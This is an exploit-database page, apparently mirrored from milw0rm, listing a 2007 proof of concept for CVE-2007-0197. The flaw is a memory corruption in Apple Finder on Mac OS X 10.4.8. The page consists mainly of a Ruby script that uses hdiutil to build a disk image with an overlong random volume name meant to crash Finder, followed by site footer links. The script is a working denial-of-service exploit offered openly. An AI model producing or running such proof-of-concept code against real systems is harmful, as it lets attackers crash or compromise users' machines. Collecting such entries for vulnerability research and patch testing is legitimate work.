[] NeoSense
E X P L O I T S
title author type platform port cve id

Apple Mac OSX 10.4.8 - Apple Finder DMG Volume Name Memory Corruption (PoC)

Author: MoAB
type: dos
platform: osx
port: 
date_added: 2007-01-08 
date_updated: 2016-09-20 
verified: 1 
codes: CVE-2007-0197 
tags: 
aliases:  
screenshot_url:  
application_url: 
#!/usr/bin/ruby
# (c) 2006 LMH <lmh [at] infopull.com>.
#

require 'fileutils'
require 'zlib'

hdiutil = "/usr/bin/hdiutil"
dmgname = (ARGV[0] || "MOAB-09-01-2007.dmg")
dmgsize = (ARGV[1] || "200k")
filesys = (ARGV[2] || "UFS")
volname = ""

255.times do
  volname << (i = Kernel.rand(62); i += ((i < 10) ? 48 : ((i < 36) ? 55 : 61 ))).chr
end

FileUtils.rm_f(dmgname)
system "#{hdiutil} create #{dmgname} -size #{dmgsize} -fs #{filesys} -volname #{volname}"

puts "++ reading #{dmgname}..."
dmg_stream = File.read(dmgname)
dmg_vnsize = dmg_stream[0x9c10,0x9c14].unpack("C2")
puts "++ volname length at dmg: #{dmg_vnsize}"
puts "++ dmg size: #{dmg_stream.size} bytes."

# milw0rm.com [2007-01-09]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.